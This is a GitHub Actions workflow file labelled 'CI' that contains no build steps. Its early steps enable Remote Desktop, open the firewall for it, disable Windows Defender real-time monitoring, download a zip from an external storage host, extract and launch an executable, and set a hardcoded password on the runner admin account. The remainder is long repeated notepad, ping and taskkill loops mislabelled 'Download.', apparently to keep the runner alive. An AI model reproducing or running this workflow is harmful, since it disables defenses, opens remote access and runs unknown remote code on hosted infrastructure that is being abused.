name: CI

on: [push, workflow_dispatch]

jobs:

  build:
    runs-on: windows-latest

    steps:
    - name: 1
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: 2
      run: New-Item -Path "C:\21" -ItemType Directory
    - name: 3
      run: New-Item -Path "C:\2" -ItemType Directory
    - name: 4
      run: New-Item -Path "C:\1" -ItemType Directory
    - name: 11
      run: Set-MpPreference -DisableRealtimeMonitoring $true
    - name: 5
      run: Invoke-WebRequest -URI "https://s3.twcstorage.ru/291a71b8-a30c-4d1a-8368-2e95b84cdc9e/1122.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=7SFZ3WNZZ680A26ASRV1%2F20260514%2Fru-1%2Fs3%2Faws4_request&X-Amz-Date=20260514T091648Z&X-Amz-Expires=3900&X-Amz-Signature=b34ac34f69e942b278f8b948f7db583e33eb3e2a83669cdc3e3aba3f924345d1&X-Amz-SignedHeaders=host&x-id=GetObject" -outfile c:\21\1122.zip
    - name: 7
      run: Expand-Archive -LiteralPath "c:\21\1122.zip" -DestinationPath "C:\21"
    - name: 15
      run: Start-Process Powershell ' -Command "C:\21\1122.exe"'
    - name: 10
      run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
    - name: Download.
      run: cmd /c start notepad.exe
    - name: Download.
      run: cmd /c ping 127.0.0.1 -n 600
    - name: Download.
      run: cmd /c taskkill /f /im notepad.exe
